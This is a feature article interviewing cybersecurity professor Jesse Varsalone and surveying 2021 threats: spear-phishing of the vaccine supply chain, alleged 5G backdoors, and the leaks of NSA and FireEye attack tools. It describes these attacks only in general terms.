Matt Zbrog
As computers, smartphones, and networks have become more sophisticated, so have the various types of cyberattacks that they face. And an increasing reliance on connected systems means that a disruption in service can have an enormous real-world impact. It’s not just PlayStation logins being hacked anymore, but hospitals, power grids, and nuclear reactors. Even the world’s most advanced cybersecurity agencies have themselves become targets of attack.
Cybersecurity is a major priority for the US in 2021 and beyond. According to the Bureau of Labor Statistics, the need for information systems analysts is set to grow 31 percent between 2019 and 2029, making it one of the fastest-growing occupations in the nation.
To defend against increasingly sophisticated cyber-threats, those cybersecurity professionals will need to be up-to-date on the field’s most pressing issues.
Jesse Varsalone is an associate professor of computer networks and cybersecurity at the University of Maryland Global Campus (UMGC). He’s also the academic advisor to the award-winning UMGC Cyber Competition Team.
Prior to joining the faculty at UMGC, Varsalone spent five years as an instructor for the Defense Cyber Investigations Training Academy (DCITA), where he was a member of the network intrusions track. Varsalone has written and contributed to several cybersecurity publications, including the book Defense Against the Black Arts: How Hackers Do What They Do, and How to Protect Against It.
By the time you’ve wrapped your head around the most recent major cyberattack, there’s probably already been another. One part of the job of a cybersecurity professional is to stay abreast of all those attacks, sometimes analyzing them as if they were case studies in a textbook. But even Varsalone admits he can’t always keep up.
“It’s been really crazy with all the hacks this year,” Varsalone says. “It’s been non-stop basically.”
Part of the reason for that is purely mathematical: as the number of technological devices on a network increases, so does the number of hypothetical vulnerabilities. Companies are rushing to market their devices, quickly amassing users, and only realizing later that they’ve neglected to properly secure everything.
“One mistake is all you need,” Varsalone says. “One mistake can really hurt you.”
The Covid-19 pandemic has exacerbated the situation. Suddenly, millions of Americans are logging on to work and school from home, and very few of them are well-read in proper data hygiene and other cybersecurity practices.
“Cyberattacks will continue to proliferate over the next couple of months, with the big emphasis on everyone working from home,” Varsalone says. “Information technology (IT) was important before the pandemic hit, but now it’s critical. It’s as critical as power and water.”
For those just beginning their cybersecurity education or career, Varsalone recommends focusing on fundamentals. That doesn’t mean programming and coding (which are helpful, but not essential).
Instead, it means understanding operating systems like Windows, Linux, and macOS. It means studying (and utilizing) cloud-based services like AWS and Azure. It means being comfortable and familiar with each device on a network, and how those devices interoperate. But the focus on more and more security isn’t always correct.
“The more we ramp up the security, the less usable the technology is,” Varsalone says. “It can get to the point where it’s so secure, it’s almost unusable. We have to find a balance. We need things that are very secure that are still easy to use.”
Varsalone has experience playing both offense and defense in the cybersecurity world. And while he sees the number of attacks going up in the near future, he remains optimistic about the good guys’ chances in the long term.
“There’s going to be a lot of good job opportunities for people in cybersecurity, and there are a lot of good quality people out there,” Varsalone says. “Companies just have to hire them, and they have to spend a lot of money on cybersecurity, and take it very seriously. When that happens, we might not think in gloom and doom. We’ll be able to look positively towards the future.”
In the coming years, the US faces innumerable cyberthreats, both large and small. To get a look at three of the most concerning for 2021, read on.
In December 2020, IBM’s X-Force discovered a series of ongoing cyberattacks against companies and organizations who were in the supply chain for coronavirus vaccines. Together with the Department of Homeland Security’s Cybersecurity Infrastructure Security Agency (CISA), the analysts uncovered a global spear-phishing campaign dating back to September.
Spear-phishing is an extremely precise version of phishing that targets individuals specifically for their access to networks and information. Here, the attackers targeted high-level executives who dealt specifically with the cooling process necessary in storing and transferring doses of the vaccine. The victims received emails that posed as official documents but included malicious HTML attachments where one was asked to enter their credentials. By having those malicious documents as local attachments instead of published web pages, the attackers were able to avoid discovery by the routine sweeps of security research teams. IBM’s X-Force believes the motive was to harvest information that would aid further access in the future.
The group responsible for the attack remains unclear, but analysts say the scheme has all the hallmark characteristics of a nation-sponsored cyberattack. The precise targeting of the spear-phishing scheme suggests a dedicated and disciplined approach to intelligence gathering, and the lack of an immediate ‘payout’ from any successful attack in this scenario seems to exclude the involvement of more independent play-for-pay hackers. Nation-states, however, are much more interested in information that directly affects the global economy, as coronavirus vaccines do.
Spear-phishing attacks are dangerous because they bypass the technical infrastructure and instead target non-cybersecurity personnel. We live in a world where someone who works at a company that specializes in refrigeration may have information that, in the wrong hands, could harm or hinder huge shipments of live-saving vaccines. Does that person know the difference between a genuine request for proposal (RFP) and an expertly-researched but fabricated one? Cybersecurity is increasingly becoming everyone’s concern.
The rollout of 5G is a double-edged sword for cybersecurity, offering more complex encryption features while also exposing new points of vulnerability through the internet of things (IoT).
But before 5G goes mainstream, there’s another concern. Huawei, a Chinese technology company with the largest market share of 5G infrastructure, has been accused of having backdoors installed in its technology. Hypothetically, those backdoors would allow the company—or the Chinese government—to listen in on private, and potentially classified, conversations. Does that sound paranoid? Or does it sound familiar?
In the US, the National Security Agency began listening in on encrypted internet traffic that ran through Cisco’s hardware and software starting in 2002 and continued to do so for the better part of a decade. The story didn’t break until Edward Snowden’s revelations of 2013, and cybersecurity experts didn’t have a clearer picture of how the NSA did what it did, in regards to Cisco, until a group known as the Shadow Brokers leaked details about NSA operations and methods in 2016.
According to independent analysis of the data exposed in that hack, the NSA had been using a specialized tool called BenignCertain to exploit a weakness in Cisco’s Internet Key Exchange (IKE) implementation, extract encryption keys, and read otherwise secure data transmitted through Cisco’s virtual private networks (VPNs). While this isn’t quite the same level of impropriety as is alleged against Huawei—with Huawei, the backdoors are said to be intentional—unintentional backdoors in software and hardware represent a major threat.
One way to mitigate that threat is with greater transparency. Most of today’s telecom networks use proprietary technology, but there’s a growing trend for a more open-source approach to code and hardware. Transparency makes it easier for cybersecurity professionals to spot back doors and patch other exploitable weaknesses. Most of the internet uses open-source software as it is—and telecommunication will eventually, hopefully, follow suit.
Some things shouldn’t be open source. While it’s already morally dubious for government agencies to spy on citizens through corporate exploits and backdoors, it’s outright dangerous when the tools they use are commandeered by bad actors. That was the case in 2016 when the Shadow Brokers auctioned off the NSA’s high-powered cyber weapons.
Beyond the ethical concerns of an American agency spying on citizens through corporate means are the more practical worries associated with other entities using cybersecurity tools for truly nefarious purposes. When the Shadow Brokers got hold of the NSA’s cyber weapons in 2016 and proceeded to auction them off to the highest bidders, it was the digital equivalent of having a high-tech armory raided, with the ill-gotten gains pawned off to those who could profit from it most. Those tools were eventually used in attacks against hospitals, government agencies, and conglomerates, causing damages that cost an estimated $10 billion.
It’s not just government agencies that are vulnerable. In December 2020, FireEye, an elite $3.5 billion cybersecurity firm, was hacked by what was likely a team of nation-state actors. The heist targeted the firm’s Red Team tools: highly advanced cyber-weapons that are meant to impersonate cyberattacks and test a system’s vulnerabilities.
While FireEye has now made key parts of the compromised tools available online to help potential victims deter attacks, the danger remains: bad actors can still use the stolen tools, and enjoy a certain level of anonymity in doing so.
Anti-proliferation groups have long dealt with securing high-powered weapons technology such as missile guidance systems and nuclear reactor components. But cyber-weapons are weightless, native to the digital sphere, and spread across the public and private sectors. Anti-proliferation requires a newer, more cyber-minded approach.
Matt Zbrog
Matt Zbrog is a writer and researcher from Southern California. Since 2018, he’s written extensively about the increasing digitization of investigations, the growing importance of forensic science, and emerging areas of investigative practice like open source intelligence (OSINT) and blockchain forensics. His writing and research are focused on learning from those who know the subject best, including leaders and subject matter specialists from the Association of Certified Fraud Examiners (ACFE) and the American Academy of Forensic Science (AAFS). As part of the Big Employers in Forensics series, Matt has conducted detailed interviews with forensic experts at the ATF, DEA, FBI, and NCIS.